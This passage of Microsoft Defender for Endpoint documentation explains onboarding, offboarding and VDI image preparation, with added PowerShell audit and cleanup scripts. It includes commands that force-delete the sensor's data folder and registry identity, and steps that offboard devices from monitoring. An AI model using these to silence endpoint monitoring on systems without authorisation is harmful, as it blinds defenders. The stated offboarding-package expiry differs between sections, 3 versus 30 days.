Turn off real-time protection                           Disabled
Turn on behavior monitoring                             Enabled
Scan all downloaded files and attachments               Enabled
Monitor file and program activity on your computer      Enabled

Policy location: \Windows Components\Microsoft Defender Antivirus\Scan

These settings configure periodic scans of the endpoint. We recommend performing a
weekly quick scan, performance permitting.

Policy                                                                                         Setting
Check for the latest virus and spyware security intelligence before running a scheduled scan   Enabled

Policy location: \Windows Components\Microsoft Defender Antivirus\Microsoft
Defender Exploit Guard\Attack Surface Reduction

Get the current list of attack surface reduction rule GUIDs from Attack surface reduction
rules deployment Step 3: Implement ASR rules. For details on each rule, see Attack
surface reduction rules reference.

1. Open the Configure Attack Surface Reduction policy.

2. Select Enabled.

3. Select the Show button.

4. Add each GUID in the Value Name field with a Value of 2.

This sets each rule to audit mode only.

Policy                               Location                                                                                                    Setting
Configure Controlled folder access   \Windows Components\Microsoft Defender Antivirus\Microsoft Defender Exploit Guard\Controlled Folder Access   Enabled, Audit Mode

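
Once the GPO has refreshed, an endpoint's effective Microsoft Defender Antivirus
configuration can be compared against the recommended settings in the tables above
with the built-in Get-MpPreference cmdlet. The following script is an added example, not
part of this article; the numeric encodings it expects (PUA 1 = block, MAPS 2 = advanced,
sample consent 1 = send safe samples, controlled folder access 2 = audit, ASR action
2 = audit) are the cmdlet's documented values. Because the ASR rule GUIDs are not listed
on this page, the script reports every rule it finds rather than checking a fixed list.

```powershell
# Added example (not from the Microsoft article): audit a device's effective Defender
# Antivirus settings against the recommended Group Policy values in the tables above.
$p = Get-MpPreference

# Each check: a label, the value the tables ask for, and what the device reports.
# "Disable*" properties are $false when the corresponding protection is on.
$checks = @(
    @{ Name = 'Real-time protection on';                Expected = $false; Actual = $p.DisableRealtimeMonitoring }
    @{ Name = 'Behavior monitoring on';                 Expected = $false; Actual = $p.DisableBehaviorMonitoring }
    @{ Name = 'Scan downloaded files/attachments on';   Expected = $false; Actual = $p.DisableIOAVProtection }
    @{ Name = 'PUA detection = Block';                  Expected = 1;      Actual = [int]$p.PUAProtection }          # 1 = block, 2 = audit
    @{ Name = 'MAPS = Advanced';                        Expected = 2;      Actual = [int]$p.MAPSReporting }          # 2 = advanced MAPS
    @{ Name = 'Sample submission = send safe samples';  Expected = 1;      Actual = [int]$p.SubmitSamplesConsent }   # 1 = safe samples, 3 = all
    @{ Name = 'Check signatures before scheduled scan'; Expected = $true;  Actual = $p.CheckForSignaturesBeforeRunningScan }
    @{ Name = 'Controlled folder access = Audit';       Expected = 2;      Actual = [int]$p.EnableControlledFolderAccess } # 2 = audit mode
)

$report = foreach ($c in $checks) {
    [pscustomobject]@{
        Check    = $c.Name
        Expected = $c.Expected
        Actual   = $c.Actual
        Ok       = ($c.Actual -eq $c.Expected)
    }
}
$report | Format-Table -AutoSize

# ASR rules: the steps above put every deployed rule into audit (value 2).
# Action encodings: 0 = off, 1 = block, 2 = audit, 6 = warn.
$ids     = @($p.AttackSurfaceReductionRules_Ids)
$actions = @($p.AttackSurfaceReductionRules_Actions)
if ($ids.Count -eq 0) {
    Write-Warning 'No ASR rules are configured on this device.'
} else {
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $action = [int]$actions[$i]
        $mode = switch ($action) { 0 {'Off'} 1 {'Block'} 2 {'Audit'} 6 {'Warn'} default {"Unknown($action)"} }
        $flag = if ($action -eq 2) { '' } else { '  <-- not audit' }
        Write-Host ("ASR rule {0}: {1}{2}" -f $ids[$i], $mode, $flag)
    }
}

$failed = @($report | Where-Object { -not $_.Ok })
if ($failed.Count) {
    Write-Warning ("{0} setting(s) differ from the recommended values; confirm the GPO applied with gpresult /r." -f $failed.Count)
}
```

Get-MpPreference shows the merged result of local and policy-managed settings, so a
mismatch here usually means the GPO has not applied yet or a different GPO with higher
precedence sets the same value.
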
Run a detection test to verify onboarding
After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Microsoft Defender for Endpoint device.

Offboard devices using Group Policy


For security reasons, the package used to offboard devices will expire 30 days after the
date it was downloaded. Expired offboarding packages sent to a device will be rejected.
When downloading an offboarding package, you'll be notified of the package's expiry
date, which is also included in the package name.

Note

Onboarding and offboarding policies must not be deployed on the same device at
the same time, otherwise this will cause unpredictable collisions.

1. Get the offboarding package from the Microsoft Defender portal :

a. In the navigation pane, select Settings > Endpoints > Device management >
Offboarding.

b. Select the operating system.

c. In the Deployment method field, select Group policy.

d. Click Download package and save the .zip file.

2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the device. You should have a file named
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd.

3. Open the Group Policy Management Console (GPMC), right-click the Group Policy
Object (GPO) you want to configure and click Edit.

4. In the Group Policy Management Editor, go to Computer configuration, then
Preferences, and then Control panel settings.

5. Right-click Scheduled tasks, point to New, and then click Immediate task.

6. In the Task window that opens, go to the General tab under Security options and
select Change User or Group, enter SYSTEM, then select Check Names and then
OK. NT AUTHORITY\SYSTEM appears as the user account that the task will run as.

7. Select Run whether user is logged on or not and check the Run with highest
privileges check-box.

8. In the Name field, type an appropriate name for the scheduled task (for example,
Defender for Endpoint Deployment).

9. Go to the Actions tab and select New.... Ensure that Start a program is selected in
the Action field. Enter the UNC path, using the file server's fully qualified domain
name (FQDN), of the shared
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd file.

10. Select OK and close any open GPMC windows.

Important

Offboarding causes the device to stop sending sensor data to the portal but data
from the device, including reference to any alerts it has had will be retained for up
to 6 months.

Monitor device configuration


With Group Policy there isn't an option to monitor deployment of policies on the
devices. Monitoring can be done directly on the portal, or by using the different
deployment tools.

Monitor devices using the portal


1. Go to the Microsoft Defender portal .
2. Click Devices inventory.
3. Verify that devices are appearing.

Note

It can take several days for devices to start showing on the Devices list. This
includes the time it takes for the policies to be distributed to the device, the time it
takes before the user logs on, and the time it takes for the endpoint to start
reporting.

Set up Defender AV policies
Create a new Group Policy or group these settings in with the other policies. This is
dependent upon the customer's environment and how they would like to roll out the
service by targeting different organizational units (OUs).

1. After you choose the GP, or create a new one, edit the GP.

2. Browse to Computer Configuration > Policies > Administrative Templates >
Windows Components > Microsoft Defender Antivirus > Real-time Protection.

3. In the Quarantine folder, configure removal of items from Quarantine folder.


4. In the Scan folder, configure the scan settings.

Monitor all files in Real time protection


Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > Real-time Protection.

Configure Windows Defender SmartScreen settings


1. Browse to Computer Configuration > Policies > Administrative Templates >
Windows Components > Windows Defender SmartScreen > Explorer.


2. Browse to Computer Configuration > Policies > Administrative Templates >
Windows Components > Windows Defender SmartScreen > Microsoft Edge.

Configure Potentially Unwanted Applications


Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus.


Configure cloud-delivered protection and send samples automatically

Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > MAPS.



Note

The Send all samples option will provide the most analysis of binaries/scripts/docs
which increases security posture. The Send safe samples option limits the type of
binaries/scripts/docs being analyzed, and decreases security posture.

For more information, see Turn on cloud protection in Microsoft Defender Antivirus, and
Cloud protection and sample submission in Microsoft Defender Antivirus.

Check for signature update


Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > Security Intelligence Updates.

Configure cloud-delivered protection timeout and protection level

Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > MpEngine. Setting the cloud protection
level policy to Default Microsoft Defender Antivirus blocking policy disables the policy;
this is what is required to set the protection level to the Windows default.

Related topics
Onboard Windows devices using Microsoft Endpoint Configuration Manager
Onboard Windows devices using Mobile Device Management tools
Onboard Windows devices using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) devices
Run a detection test on a newly onboarded Microsoft Defender for Endpoint
devices
Troubleshoot Microsoft Defender for Endpoint onboarding issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Onboard Windows devices using a local
script
Article • 09/01/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

You can also manually onboard individual devices to Defender for Endpoint. You might
want to do this first when testing the service before you commit to onboarding all
devices in your network.

Important

This script has been optimized for use on up to ten devices. Local scripting is a
special onboarding method for evaluating Microsoft Defender for Endpoint. The
data reporting frequency is set higher than with other onboarding methods when
onboarding using a local script. This setting is for evaluation purposes and is not
normally used in production deployments. For this reason, there are concerns
about environmental impact, so we recommend limiting the number of
deployments using local scripts to ten. If you are deploying to a production
environment as previously described, use other deployment options like Group
Policy or Microsoft Endpoint Configuration Manager.

Check out Identify Defender for Endpoint architecture and deployment method to see
the various paths in deploying Defender for Endpoint.

Onboard devices
1. Open the configuration package .zip file
(WindowsDefenderATPOnboardingPackage.zip) that you downloaded from the
service onboarding wizard. You can also get the package from Microsoft Defender
portal :
a. In the navigation pane, select Settings > Endpoints > Device management >
Onboarding.
b. Select Windows 10 or Windows 11 as the operating system.
c. In the Deployment method field, select Local Script.
d. Click Download package and save the .zip file.

2. Extract the contents of the configuration package to a location on the device you
want to onboard (for example, the Desktop). You should have a file named
WindowsDefenderATPLocalOnboardingScript.cmd.

3. Open an elevated command-line prompt on the device and run the script:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.

4. Type the location of the script file. If you copied the file to the desktop, type:
%userprofile%\Desktop\WindowsDefenderATPLocalOnboardingScript.cmd

5. Press the Enter key or click OK.

6. Type "Y" and press Enter when prompted.

7. After the script completes, it will display "Press any key to continue...". Press any
key to complete the steps on the device.

For information on how you can manually validate that the device is compliant and
correctly reports sensor data, see Troubleshoot Microsoft Defender for Endpoint
onboarding issues.

Tip

After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a
detection test on a newly onboarded Microsoft Defender for Endpoint device.

Configure sample collection settings


For each device, you can set a configuration value to state whether samples can be
collected from the device when a request is made through Microsoft Defender XDR to
submit a file for deep analysis.

You can manually configure the sample sharing setting on the device by using regedit or
creating and running a .reg file.

The configuration is set through the following registry key entry:

Console

Path: "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
Name: "AllowSampleCollection"
Value: 0 or 1

Where the Name type is a DWORD. Possible values are:

0 - doesn't allow sample sharing from this device
1 - allows sharing of all file types from this device

The default value in case the registry key doesn't exist is 1.
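
Rather than editing the value by hand in regedit, the setting can be read and written from
PowerShell. The following is an added example, not code from this article; the key path,
value name, DWORD type and the meaning of 0 and 1 are exactly as stated above, and the
function names are this example's own. The read function reports the effective value,
returning 1 when the value is absent, as the page says the default is.

```powershell
# Added example (not from the Microsoft article): manage the per-device
# AllowSampleCollection value. Run from an elevated PowerShell prompt.
$SampleKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'

function Get-SampleCollectionSetting {
    # Returns whether the value is explicitly set and what the device will honour.
    # A missing value means the default (1 = sample sharing allowed) applies.
    $value = (Get-ItemProperty -Path $SampleKey -Name AllowSampleCollection -ErrorAction SilentlyContinue).AllowSampleCollection
    if ($null -eq $value) {
        return [pscustomobject]@{ Configured = $false; Effective = 1 }
    }
    [pscustomobject]@{ Configured = $true; Effective = [int]$value }
}

function Set-SampleCollectionSetting {
    # Only 0 (block sample sharing) and 1 (allow) are meaningful; anything else is rejected
    # by the parameter validation before the registry is touched.
    param([Parameter(Mandatory)][ValidateSet(0, 1)][int]$Allow)
    if (-not (Test-Path $SampleKey)) {
        New-Item -Path $SampleKey -Force | Out-Null
    }
    # Write a DWORD, the type the page specifies, rather than a string "0"/"1".
    Set-ItemProperty -Path $SampleKey -Name AllowSampleCollection -Value $Allow -Type DWord
    Get-SampleCollectionSetting
}

# Usage:
Get-SampleCollectionSetting             # fresh device: Configured=False, Effective=1
# Set-SampleCollectionSetting -Allow 0  # opt this device out of deep-analysis sample collection
```

Devices managed by Group Policy will have this value re-applied at the next policy
refresh, so on those devices change it through the GPO described in the Group Policy
onboarding article rather than locally.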

Run a detection test to verify onboarding


After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Microsoft Defender for Endpoint device.

Offboard devices using a local script


For security reasons, the package used to offboard devices will expire 3 days after the
date it was downloaded. Expired offboarding packages sent to a device will be rejected.
When downloading an offboarding package, you will be notified of the package's expiry
date, which is also included in the package name.

Note

Onboarding and offboarding policies must not be deployed on the same device at
the same time, otherwise this will cause unpredictable collisions.

1. Get the offboarding package from Microsoft Defender portal:

a. In the navigation pane, select Settings > Endpoints > Device management >
Offboarding.
b. Select Windows 10 or Windows 11 as the operating system.
c. In the Deployment method field, select Local Script.
d. Click Download package and save the .zip file.

2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the devices. You should have a file named
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd.

3. Open an elevated command-line prompt on the device and run the script:

a. Go to Start and type cmd.

b. Right-click Command prompt and select Run as administrator.

4. Type the location of the script file. If you copied the file to the desktop, type:
%userprofile%\Desktop\WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd

5. Press the Enter key or click OK.

Important

Offboarding causes the device to stop sending sensor data to the portal but data
from the device, including reference to any alerts it has had will be retained for up
to 6 months.

Monitor device configuration


You can follow the different verification steps in the Troubleshoot onboarding issues to
verify that the script completed successfully and the agent is running.

Monitoring can also be done directly on the portal, or by using the different deployment
tools.

Monitor devices using the portal


1. Go to Microsoft Defender portal .

2. Click Devices inventory.

3. Verify that devices are appearing.

Related articles
Onboard Windows devices using Group Policy
Onboard Windows devices using Microsoft Endpoint Configuration Manager
Onboard Windows devices using Mobile Device Management tools
Onboard non-persistent virtual desktop infrastructure (VDI) devices
Run a detection test on a newly onboarded Microsoft Defender for Endpoint
device
Troubleshoot Microsoft Defender for Endpoint onboarding issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Onboard non-persistent virtual desktop
infrastructure (VDI) devices in Microsoft
Defender XDR
Article • 09/21/2023

Virtual desktop infrastructure (VDI) is an IT infrastructure concept that lets end users
access enterprise virtual desktop instances from almost any device (such as a personal
computer, smartphone, or tablet), eliminating the need for organizations to provide
users with physical machines. Using VDI devices reduces cost, as IT departments are no
longer responsible for managing, repairing, and replacing physical endpoints.
Authorized users can access the same company servers, files, apps, and services from
any approved device through a secure desktop client or browser.

Like any other system in an IT environment, these too should have an Endpoint
Detection and Response (EDR) and Antivirus solution to protect against advanced
threats and attacks.

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Virtual desktop infrastructure (VDI) devices
Windows 10, Windows 11, Windows Server 2019, Windows Server 2022, Windows
Server 2008R2/2012R2/2016

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

Persistent VDIs - Onboarding a persistent VDI machine into Microsoft Defender for
Endpoint is handled the same way you would onboard a physical machine, such as
a desktop or laptop. Group policy, Microsoft Configuration Manager, and other
methods can be used to onboard a persistent machine. In the Microsoft Defender
portal (https://security.microsoft.com ), under onboarding, select your preferred
onboarding method, and follow the instructions for that type. For more information,
see Onboarding Windows client.

Onboarding non-persistent virtual desktop infrastructure (VDI) devices
Defender for Endpoint supports non-persistent VDI session onboarding.

There might be associated challenges when onboarding VDI instances. The following are
typical challenges for this scenario:

Instant early onboarding of a short-lived session, which must be onboarded to
Defender for Endpoint prior to the actual provisioning.
The device name is typically reused for new sessions.

In a VDI environment, VDI instances can have short lifespans. VDI devices can appear in
the Microsoft Defender portal as either single entries for each VDI instance or multiple
entries for each device.

Single entry for each VDI instance. If the VDI instance was already onboarded to
Microsoft Defender for Endpoint, and at some point deleted, and then recreated
with the same host name, a new object representing this VDI instance is NOT
created in the portal.

Note

In this case, the same device name must be configured when the session is
created, for example using an unattended answer file.

Multiple entries for each device - one for each VDI instance.

Important

If you're deploying non-persistent VDIs through cloning technology, make sure
that your internal template VMs are not onboarded to Defender for Endpoint. This
recommendation is to avoid cloned VMs from being onboarded with the same
senseGuid as your template VMs, which could prevent VMs from showing up as
new entries in the Devices list.

The following steps guide you through onboarding VDI devices and highlight steps for
single and multiple entries.

Warning
For environments where there are low resource configurations, the VDI boot
procedure might slow the Defender for Endpoint sensor onboarding.

Onboarding steps

Note

Windows Server 2016 and Windows Server 2012 R2 must be prepared by applying
the installation package first using the instructions in Onboard Windows servers
for this feature to work.

1. Open the VDI configuration package .zip file
(WindowsDefenderATPOnboardingPackage.zip) that you downloaded from the
service onboarding wizard. You can also get the package from the Microsoft
Defender portal:

a. In the navigation pane, select Settings > Endpoints > Device management >
Onboarding.

b. Select the operating system.

c. In the Deployment method field, select VDI onboarding scripts for non-
persistent endpoints.

d. Click Download package and save the .zip file.

2. Copy the files from the WindowsDefenderATPOnboardingPackage folder extracted
from the .zip file into the golden/primary image under the path
C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup.

a. If you are implementing multiple entries for each device - one for each session,
copy WindowsDefenderATPOnboardingScript.cmd.

b. If you're implementing a single entry for each device, copy both Onboard-
NonPersistentMachine.ps1 and WindowsDefenderATPOnboardingScript.cmd.

Note

If you don't see the C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup
folder, it might be hidden. You'll need to choose the Show hidden files and folders
option from File Explorer.

3. Open a Local Group Policy Editor window and navigate to Computer
Configuration > Windows Settings > Scripts > Startup.

Note

Domain Group Policy may also be used for onboarding non-persistent VDI
devices.

4. Depending on the method you'd like to implement, follow the appropriate steps:

For single entry for each device:

Select the PowerShell Scripts tab, then select Add (Windows Explorer opens
directly in the path where you copied the onboarding script earlier). Navigate
to onboarding PowerShell script Onboard-NonPersistentMachine.ps1 . There's
no need to specify the other file, as it is triggered automatically.

For multiple entries for each device:

Select the Scripts tab, then click Add (Windows Explorer opens directly in the
path where you copied the onboarding script earlier). Navigate to the
onboarding batch script WindowsDefenderATPOnboardingScript.cmd.

5. Test your solution:

a. Create a pool with one device.

b. Log on to device.

c. Log off from device.

d. Log on to device with another user.

e. Depending on the method you'd like to implement, follow the appropriate
steps:

For single entry for each device: Check only one entry in Microsoft
Defender portal.
For multiple entries for each device: Check multiple entries in Microsoft
Defender portal.

6. Click Devices list on the Navigation pane.

7. Use the search function by entering the device name and select Device as search
type.

For downlevel SKUs (Windows Server 2008 R2)

Note

These instructions for other Windows server versions also apply if you are running
the previous Microsoft Defender for Endpoint for Windows Server 2016 and
Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the new
unified solution are at Server migration scenarios in Microsoft Defender for
Endpoint.

The following registry is relevant only when the aim is to achieve a 'Single entry for each
device'.

1. Set registry value to:

Console

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging]
"VDI"="NonPersistent"

or using command line:

Console

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging" /v VDI /t REG_SZ /d "NonPersistent" /f

2. Follow the server onboarding process.

Updating virtual desktop infrastructure (VDI) images (persistent or non-persistent)

With the ability to easily deploy updates to VMs running in VDIs, we've shortened this
guide to focus on how you can get updates on your machines quickly and easily. You no
longer need to create and seal golden images on a periodic basis, as updates are
expanded into their component bits on the host server and then downloaded directly to
the VM when it's turned on.

If you have onboarded the primary image of your VDI environment (SENSE service is
running), then you must offboard and clear some data before putting the image back
into production.

1. Offboard the machine.

2. Ensure the sensor is stopped by running the following command in a CMD
window:

Console

sc query sense

3. Run the following commands in a CMD window:

Console

del "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Cyber\*.*" /f /s /q
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection" /v senseGuid /f
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection" /v 7DC0B629-D7F6-4DB3-9BF7-64D5AAF50F1A /f
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\48A68F11-7A16-4180-B32C-7F974C7BD783" /f
exit
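
The downlevel tagging step above and the image cleanup in this section are the two
registry-level actions an image-preparation pipeline has to perform, and both are easy to
get wrong if the sensor is still running or the wrong key is removed. The following
PowerShell is an added example, not the commands from this article or from an
onboarding package: it defaults to a dry run, refuses to clear identity data while the
Sense service is running (the same condition the sc query sense step checks), and uses
only the paths, value names and GUIDs listed in this section. The function and switch
names are this example's own.

```powershell
# Added example (not from the Microsoft article): prepare a VDI golden image.
#   .\Prepare-VdiImage.ps1                    -> dry run, reports what would change
#   .\Prepare-VdiImage.ps1 -Apply             -> clear sensor identity (after offboarding)
#   .\Prepare-VdiImage.ps1 -Apply -TagNonPersistent  -> also set the downlevel-SKU tag
param(
    [switch]$Apply,             # without -Apply nothing is modified
    [switch]$TagNonPersistent   # only for the downlevel (MMA-based) servers described above
)

$SenseKey  = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection'
$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging'
$CyberDir  = 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Cyber'

function Test-SenseStopped {
    # Same check as "sc query sense": identity data must not be cleared under a running sensor.
    $svc = Get-Service -Name Sense -ErrorAction SilentlyContinue
    if ($null -eq $svc) { return $true }     # sensor not installed on this image
    return $svc.Status -eq 'Stopped'
}

function Set-VdiNonPersistentTag {
    # Equivalent of the "reg add ... /v VDI /t REG_SZ /d NonPersistent" step above.
    if ($Apply) {
        if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
        Set-ItemProperty -Path $PolicyKey -Name VDI -Value 'NonPersistent' -Type String
    }
    $state = if ($Apply) { 'applied' } else { 'dry run' }
    Write-Host "Tag VDI=NonPersistent under $PolicyKey ($state)"
}

function Clear-SenseIdentity {
    # Removes the per-device identity so clones do not inherit the template's senseGuid.
    if (-not (Test-SenseStopped)) {
        throw 'Sense service is still running; offboard the image and stop the sensor first.'
    }
    $targets = @(
        @{ Kind = 'files'; Path = $CyberDir }
        @{ Kind = 'value'; Path = $SenseKey; Name = 'senseGuid' }
        @{ Kind = 'value'; Path = $SenseKey; Name = '7DC0B629-D7F6-4DB3-9BF7-64D5AAF50F1A' }
        @{ Kind = 'key';   Path = "$SenseKey\48A68F11-7A16-4180-B32C-7F974C7BD783" }
    )
    foreach ($t in $targets) {
        $label = if ($t.Name) { "$($t.Path)\$($t.Name)" } else { $t.Path }
        if (-not $Apply) { Write-Host "Would remove $($t.Kind): $label"; continue }
        switch ($t.Kind) {
            'files' { if (Test-Path $t.Path) { Remove-Item -Path "$($t.Path)\*" -Recurse -Force } }
            'value' { Remove-ItemProperty -Path $t.Path -Name $t.Name -Force -ErrorAction SilentlyContinue }
            'key'   { Remove-Item -Path $t.Path -Recurse -Force -ErrorAction SilentlyContinue }
        }
        Write-Host "Removed $($t.Kind): $label"
    }
}

if ($TagNonPersistent) { Set-VdiNonPersistentTag }
Clear-SenseIdentity
```

Run the dry run first and compare its output with the del and REG DELETE lines above;
only then re-run with -Apply, and only after the offboarding step has completed and the
sensor is stopped.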

Are you using a third party for VDIs?


If you're deploying non-persistent VDIs through VMware instant cloning or similar
technologies, make sure that your internal template VMs and replica VMs are not
onboarded to Defender for Endpoint. If you onboard devices using the single entry
method, instant clones that are provisioned from onboarded VMs might have the same
senseGuid, and that can stop a new entry from being listed in the Device Inventory view
(in the Microsoft Defender portal , choose Assets > Devices).

If either the primary image, template VM, or replica VM are onboarded to Defender for
Endpoint using the single entry method, it will stop Defender from creating entries for
new non-persistent VDIs in the Microsoft Defender portal.

Reach out to your third-party vendors for further assistance.


Other recommended configuration settings
After onboarding devices to the service, it's important to take advantage of the included
threat protection capabilities by enabling them with the following recommended
configuration settings.

Next generation protection configuration


The following configuration settings are recommended:

Cloud Protection Service


Turn on cloud-delivered protection: Yes
Cloud-delivered protection level: Not configured
Defender Cloud Extended Timeout In Seconds: 20

Exclusions

Please review the FSLogix antivirus exclusion recommendations here: Prerequisites
for FSLogix.

Real-time Protection
Turn on all settings and set to monitor all files

Remediation
Number of days to keep quarantined malware: 30
Submit samples consent: Send all samples automatically
Action to take on potentially unwanted apps: Enable
Actions for detected threats:
Low threat: Clean
Moderate threat, High threat, Severe threat: Quarantine

Scan
Scan archived files: Yes
Use low CPU priority for scheduled scans: Not configured
Disable catch-up full scan: Not configured
Disable catchup quick scan: Not configured
CPU usage limit per scan: 50
Scan mapped network drives during full scan: Not configured
Run daily quick scan at: 12 PM
Scan type: Not configured
Day of week to run scheduled scan: Not configured
Time of day to run a scheduled scan: Not configured
Check for signature updates before running scan: Yes

Updates

Enter how often to check for security intelligence updates: 8

Leave other settings in default state

User experience
Allow user access to Microsoft Defender app: Not configured

Enable Tamper protection


Enable tamper protection to prevent Microsoft Defender being disabled: Enable

Attack surface reduction


Enable network protection: Test mode
Require SmartScreen for Microsoft Edge: Yes
Block malicious site access: Yes
Block unverified file download: Yes

Attack surface reduction rules


Configure all available rules to Audit.

Note

Blocking these activities may interrupt legitimate business processes. The best
approach is setting everything to audit, identifying which ones are safe to turn on,
and then enabling those settings on endpoints which do not have false positive
detections.

Related topics
Onboard Windows devices using Group Policy
Onboard Windows devices using Microsoft Configuration Manager
Onboard Windows devices using Mobile Device Management tools
Onboard Windows devices using a local script
Troubleshoot Microsoft Defender for Endpoint onboarding issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Onboard Windows devices in Azure
Virtual Desktop
Article • 01/18/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Windows multi-session running on Azure Virtual Desktop (AVD)
Windows 10 Enterprise Multi-Session

Microsoft Defender for Endpoint supports monitoring both VDI and Azure Virtual
Desktop sessions. Depending on your organization's needs, you might need to
implement VDI or Azure Virtual Desktop sessions to help your employees access
corporate data and apps from an unmanaged device, remote location, or similar
scenario. With Microsoft Defender for Endpoint, you can monitor these virtual machines
for anomalous activity.

Before you begin


Familiarize yourself with the considerations for non-persistent VDI. While Azure Virtual
Desktop doesn't provide non-persistence options, it does provide ways to use a golden
Windows image that can be used to provision new hosts and redeploy machines. This
increases volatility in the environment and thus impacts what entries are created and
maintained in the Microsoft Defender for Endpoint portal, potentially reducing visibility
for your security analysts.

Note

Depending on your choice of onboarding method, devices can appear in Microsoft
Defender for Endpoint portal as either:

Single entry for each virtual desktop
Multiple entries for each virtual desktop

Microsoft recommends onboarding Azure Virtual Desktop as a single entry per virtual
desktop. This ensures that the investigation experience in the Microsoft Defender for
Endpoint portal is in the context of one device based on the machine name.
Organizations that frequently delete and redeploy AVD hosts should strongly consider
using this method, as it prevents multiple objects for the same machine from being
created in the Microsoft Defender for Endpoint portal; multiple objects for one machine
lead to confusion when investigating incidents. For test or non-volatile environments,
you may opt to choose differently.

Microsoft recommends adding the Microsoft Defender for Endpoint onboarding script
to the AVD golden image. This way, you can be sure that this onboarding script runs
immediately at first boot. It's executed as a startup script at first boot on all the AVD
machines that are provisioned from the AVD golden image. However, if you're using one
of the gallery images without modification, place the script in a shared location and call
it from either local or domain group policy.

Note

The placement and configuration of the VDI onboarding startup script on the AVD
golden image configures it as a startup script that runs when the AVD starts. It's not
recommended to onboard the actual AVD golden image. Another consideration is
the method used to run the script. It should run as early in the startup/provisioning
process as possible to reduce the time between the machine being available to
receive sessions and the device onboarding to the service. Scenarios 1 and 2 below
take this into account.

Scenarios
There are several ways to onboard an AVD host machine:

Run the script in the golden image (or from a shared location) during startup.
Use a management tool to run the script.
Through Integration with Microsoft Defender for Cloud

Scenario 1: Using local group policy

This scenario requires placing the script in a golden image and uses local group policy
to run early in the boot process.

Use the instructions in Onboard the non-persistent virtual desktop infrastructure (VDI)
devices.

Follow the instructions for a single entry for each device.

Scenario 2: Using domain group policy

This scenario uses a centrally located script and runs it using a domain-based group
policy. You can also place the script in the golden image and run it in the same way.

Download the WindowsDefenderATPOnboardingPackage.zip file from the Microsoft
Defender portal

1. Open the VDI configuration package .zip file
(WindowsDefenderATPOnboardingPackage.zip):
a. In the Microsoft Defender portal navigation pane, select Settings > Endpoints >
Onboarding (under Device Management).
b. Select Windows 10 or Windows 11 as the operating system.
c. In the Deployment method field, select VDI onboarding scripts for non-persistent
endpoints.
d. Click Download package and save the .zip file.

2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the device. You should have a folder called OptionalParamsPolicy and
the files WindowsDefenderATPOnboardingScript.cmd and
Onboard-NonPersistentMachine.ps1.

Use Group Policy management console to run the script when the virtual machine
starts

1. Open the Group Policy Management Console (GPMC), right-click the Group Policy
Object (GPO) you want to configure and click Edit.

2. In the Group Policy Management Editor, go to Computer configuration >
Preferences > Control panel settings.

3. Right-click Scheduled tasks, click New, and then click Immediate Task (At least
Windows 7).

4. In the Task window that opens, go to the General tab. Under Security options click
Change User or Group and type SYSTEM. Click Check Names and then click OK.
NT AUTHORITY\SYSTEM appears as the user account the task will run as.

5. Select Run whether user is logged on or not and check the Run with highest
privileges check box.

6. Go to the Actions tab and click New. Ensure that Start a program is selected in the
Action field. Enter the following:

Action = "Start a program"
Program/Script = C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
Add Arguments (optional) = -ExecutionPolicy Bypass -command "& \\Path\To\Onboard-NonPersistentMachine.ps1"

Then select OK and close any open GPMC windows.
